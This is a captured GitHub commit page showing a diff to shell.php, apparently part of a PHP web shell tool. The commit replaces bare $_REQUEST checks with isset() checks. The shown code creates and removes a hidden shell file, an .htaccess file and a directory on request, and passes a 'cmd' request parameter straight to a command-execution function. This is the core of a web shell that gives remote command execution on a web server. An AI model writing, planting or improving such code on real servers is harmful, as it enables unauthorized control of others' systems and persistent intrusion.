We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 6d8ec10 commit 62bd95fCopy full SHA for 62bd95f
shell.php
@@ -98,21 +98,21 @@ function execute_command($shell, $cmd) {
98
$shell = "$dir/$shell";
99
$ext = pathinfo($shell, PATHINFO_EXTENSION);
100
101
-if ($_REQUEST['remove']) {
+if (isset($_REQUEST['remove'])) {
102
remove_shell($shell);
103
remove_htaccess($htaccess);
104
remove_directory($dir);
105
}
106
107
-if ($_REQUEST['create']) {
+if (isset($_REQUEST['create'])) {
108
create_directory($dir);
109
create_htaccess($htaccess, $ext);
110
create_shell($shell);
111
112
113
display_shell($shell);
114
115
-if ($_REQUEST['cmd']) {
+if (isset($_REQUEST['cmd'])) {
116
$cmd = $_REQUEST['cmd'];
117
execute_command($shell, $cmd);
118
0 commit comments